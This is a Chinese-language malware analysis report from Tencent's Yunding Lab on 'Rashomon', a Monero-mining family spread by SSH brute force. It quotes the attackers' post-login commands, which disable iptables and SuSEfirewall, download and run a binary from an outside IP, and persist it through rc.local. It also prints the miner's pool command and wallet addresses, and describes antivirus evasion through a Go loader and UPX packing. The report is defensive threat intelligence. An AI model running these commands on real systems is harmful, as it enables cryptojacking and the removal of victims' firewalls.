門羅幣挖礦新家族「羅生門」
一、前言
騰訊安全雲鼎實驗室通過部署的威脅感知系統捕獲了一批挖礦樣本(具有同源性),是一批可挖取門羅幣(xmr)的挖礦病毒。這批樣本今年5月開始出現,目前各大殺軟對此樣本基本無法有效查殺,騰訊云云鏡第一時間跟進查殺。根據進一步溯源的信息可以推測該挖礦團伙利用被入侵的博彩網站伺服器進行病毒傳播。
分析顯示,此挖礦樣本不具有傳播性,總體結構式是 Loader + 挖礦子體,挖礦團伙通過控制的機器進行遠程 SSH 暴力破解並將病毒進行傳播。由於目前能對付此病毒的殺軟極少,且該病毒通過入侵的賭博網站伺服器進行病毒傳播、挖礦,讓真相撲朔迷離,雲鼎實驗室威脅情報小組將本次門羅幣挖礦新家族命名為「羅生門」。
二、入侵分析
挖礦樣本通過母體釋放挖礦子體,母體是 Loader ,釋放挖礦子體,執行挖礦子體。母體本身不包含 SSH 爆破等蠕蟲動作,子體就是單純的挖礦代碼(加殼變形 UPX)。通過觀測發現,進行 SSH 爆破的主機 IP 較少且固定,可以認定為固定機器,使用工具進行掃描、爆破。通過這種廣撒網的方式,犯罪團伙能收穫不少門羅幣。
攻擊流程圖:
攻擊過程示意:
攻擊日誌來源:
http://bikewiki.jp:5000/app/2018/07/27/073148-4879.log
母體 Loader 詳細分析:
母體 Loader 的行為包含自啟動和釋放運行文件兩個部分。
自啟動代碼:
在函數 main_Boot 中通過 sed 編輯 rc.local 和 boot.local 來進行自啟動。
釋放文件:
執行文件:
三、病毒子體分析
通過對挖礦樣本進行分析發現,子體是一個加殼後的標準礦機程序,
子體加殼
也是導致殺軟無法查殺的一個方式。子體加殼為 UPX 變形殼,可以抵抗通用脫殼機的脫殼。手動脫殼後發現為標準挖礦程序(開源礦機程序)。相關開源項目連接為:
https://github.com/sumoprojects/cryptonote-sumokoin-pool
四、礦池分析與統計
據觀測今年5月至9月初,蜜罐捕獲的「羅生門」挖礦病毒累計挖出約12.16個門羅幣,價值約1w人民幣(2018年10月8日,門羅幣價格為114.2USD,合計1388.67美金),算力為8557H/S,大約是皮皮蝦礦池的百分之一算力。從算力上看,這種廣撒網式的傳播,也能有一定的規模。
挖礦樣本執行挖礦的命令如下:
-B -ostratum+tcp://mine.ppxxmr.com:7777-u 41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCM"Qf1FwzqEi-px -k --max-cpu-usage=75
從挖礦命令中可知,挖礦樣本對 CPU 利用率有一定的限制,最大 CPU 使用量為75%。
挖礦樣本針對的礦池地址和門羅幣(xmr)產量如下:
對應的錢包地址為:
錢包地址:
45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT
45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT
45vKgdPY4M3Lp4RXWccWCBFP7HCtcp718GyGaNVmi58j9rdDX716yz5MKXT2EDjFixgPW8mjnaXvz2cBUpEqVCLKFH1z9Tx
45vKgdPY4M3Lp4RXWccWCBFP7HCtcp718GyGaNVmi58j9rdDX716yz5MKXT2EDjFixgPW8mjnaXvz2cBUpEqVCLKFH1z9Tx
41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCMQf1FwzqEi
45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT
45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT
47xB4pdBngkhgTD1MdF9sidCa6QRXb4gv6qcGkV1TT4XD6LfZPo12CxeX8LCrqpVZm2eN3uAZ1zMQCcPnhWbLoPgNbK8y3Z
41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCMQf1FwzqEi
五、免殺分析
1
、檢測效果:將挖礦樣本在 VirusTotal 中檢測發現,除了 Drweb 可以檢出此樣本,其餘殺軟均無法有效檢測此樣本。挖礦病毒5月出現,流行3月有餘,VirusTotal 上依然只有1款殺軟可以查殺。
下圖是挖礦樣本在 VirusTotal 中的檢測結果:
2、免殺流程:
基本所有殺軟都無法查殺此病毒,此病毒通過 Go 語言 Loader 和子體加變形 UPX 殼進行免殺,對於 Linux 查殺較為薄弱的殺軟,很容易漏報。
免殺示意圖:
Loader
使用 Go 語言編寫,大量的 Go 語言的庫代碼掩蓋了真正的病毒代碼部分,所以免殺效果較好。2155個 Go 語言庫函數,真正的病毒代碼包含在4個函數中。
六、溯源分析
對這批挖礦樣本進行溯源分析發現,從今年5月開始,發起攻擊的 IP一共有兩個:
160.124.67.66
、
123.249.34.103
另外,樣本下載地址:
181.215.242.240
、
123.249.9.141
、
123.249.34.103
、
58.221.72.157
、
160.124.48.150
SSH
暴力破解成功後執行的命令有(suSEfirewall的關閉、iptables 的關閉、樣本的下載):
/etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;cd/tmp;
wget -chttp://181.215.242.240/armtyu;
chmod 777 armtyu;./armtyu;
echo 「cd/tmp/「>>/etc/rc.local;
echo」./armtyu&」>>/etc/rc.local;echo 「/etc/init.d/iptablesstop
IP **地址 ** |
伺服器地址 |
對外開放服務 |
其他描述 |
---|---|---|---|
181.215.242.240 |
美國 |
netbios |
ftp 、垃圾郵件、殭屍網路 |
160.124.67.66 |
中國 香港 |
netbios | mmhongcan168.com 、28zuche.com、014o.com、ip28.net、掃描 |
160.124.48.150 |
中國 香港 |
netbios | ip28.net 、掃描 |
123.249.9.141 |
中國 貴州 |
殭屍網路 |
(
掃描
IP
和下載
IP
信息表)
表格中 160.124.67.66 是掃描 IP,通過對 IP 信息的圖譜聚類,發現香港的兩台主機均為一個團伙控制的機器。美國和貴州的機器是入侵得到的機器。
(團伙圖聚類)
上面提到的掃描機器均為賭博網站的機器,曾經的域名mmhongcan168、28zuche 等都是賭博網站。
28zuche
:另一台香港機器的域名為 himitate.com,也是賭博網站。
兩台香港主機均為 ip28.net,都可以作為門羅幣(xmr)的挖礦代理主機。
黑產江湖之黑吃黑:
有人的地方就有江湖,黑產作為互聯網中的法外之地,弱肉強食也是這個不法之地的規則。有做大產業的黑產大佬,也有干一票就走的小團伙,黑吃黑幾乎天天都在上演。
賭博網站和色情網站是黑吃黑中常常被吃的對象,經研究分析可知,眾多賭博網站所在的伺服器竟被用來做掃描,各賭博網站之間並沒發現強關聯性,做賭博的團夥同時做挖礦的跨界運營也不是很多,而且整個挖礦金額不高。挖礦團伙若是入侵了賭博網站,利用其作為病毒伺服器傳播挖礦病毒,這也不是不可能。
對於美國和貴州的兩台下載機,根據 threatbook 的情報,這兩台主機應該是肉雞,如下圖:
第二個掃描地址為:
123.249.34.103
58.221.72.157 |
江蘇 |
rat |
---|---|---|
123.249.34.103 |
貴州 |
scan |
mdb7.cn |
美國 |
bot |
地理位置:
掃描地址 123.249.34.103的實際地址為中國貴州黔西南布依族苗族自治州,相關的情報如下:
相關網站解析過的地址為:
f6ae.com
www.f6ae.com
www.h88049.com
www.h88034.com
h88032.com
www.h88032.com
h88034.com
h88049.com
h5770.com
h88051.com
以上 URL 地址均為賭博網站:
其他的一些情報
:雲鼎實驗室威脅情報團隊在網路上也觀測到這些 IP 的掃描行為,很多日誌都有記錄。可以發現這個挖礦樣本的掃描傳播是一種無針對的、廣撒網式的暴力破解傳播模式。
日誌地址1:
ftp://egkw.com/Program%20Files/Apache%20Software%20Foundation/Tomcat%207.0/logs/localhost_access_log.2018-04-28.txt
日誌地址2:
http://217.31.192.50/data/proki2018-05-13.txt
七、總結
通過觀測發現掃
描主機均屬於賭博網站,賭博等黑產現在開始向挖礦業務進軍了嗎?。
防禦方法:
(1)修改 SSH 口令,要定期更換 SSH 口令,並保證一定的複雜度。
(2)安裝騰訊云云鏡,提前發現可疑木馬及暴力破解行為。
(3)對於外部SSH 連接的 IP 進行黑白名單限制。
相關樣本 hash:
48f82a24cf1e99c65100c2761f65265c
723bd57431aa759d68cecb83fc8a7df8
a357b1b00e62cab7dc8953522f956009
470e7cdac0360ac93250f70a892a8d03
788eaec718569c69b21ff3daef723a8f
bf34509ae03b6f874f6f0bf332251470
580cb306c4e4b25723696cb0a3873db4
826f3e5ee3addfbf6feadfe5deadbe5e
dd68a5a3bf9fbb099c9c29e73dbab782
相關中間文件 sha256:
8797e998c01d2d6bb119beb2bbae3c2f84b6ae70c55edd108ed0e340972cf642
f8e1957e8bfd7f281a76d1e42694049c67f39dea90ac36e9d589c14cdf8924bc
f54b1e99039037f424e7e2ada7ae0740b6d1da229688a81e95fd6159f16fbbc1
ca60d04204aa3195e8cd72887c7deced1a7c664e538256f138b5698d381ceb00
e8b70f11c412a75ccfb48771029679db72c27bd61c41c72e65be5464415df95f
08fd38e2891942dadd936d71b7e98055ba48c58bc986d5c58f961055bcc378fc
08a31726ae65f630ce83b9a0a44108ff591809b14db5b7c0d0be2d0829211af5
1ac7ba4ba4b4a8c57b16cf4fac6ea29e41c0361c3260bf527278525b4bec5601
396a2174d2f09e8571e0f513a8082ccdd824e988b83393217274e64fe0dafd69
b238c09c3fdbda62df39039ed49d60d42d32312eedadfc2c6ced4d65d27b1ddb
99802523c466ea9273de893be5c12c7c654dfd4deb5a896b55718e69b721e548
786f4d124ef75e9f45d650fbd859d591a03ca71e2625f50d3078503f76edfd34
1dfb2cd3c94c624691534446ece255c49ed3ba02f45128c19e5a853dcf6f6ab8
472ba9ddbef409975284e4428071d5b8eb576f2b27ad19ca2fad7094aeebd281
1fa25061004ea01311b2d27feda124b4262b5611f91882c2d9895f0a53016051
58ad0006fe9fd093c7af6f0065a93209f21074d6694f0351f25ece1b78b7a978
fbb1396e37adcab88a0e21f9e0366c8da9a199652906fa194caccef8f70844c3
f8ccdcc45c6cbd4cc1c8f56a320106cfc9c42ad94b499d5ca6ec280b1077bf41
ffb9568a7b5da78389d20daba65e2e693e8c9828c874ad8771dcd5bb5c8a1e57
f5aed11216ee356a4896ad22f375e2b62b7ca22e83737f24ec0e5cdaa400b051
*本文作者murphyzhang(騰訊安全雲鼎實驗室),轉載請註明來自 FreeBuf.COM。
推薦閱讀: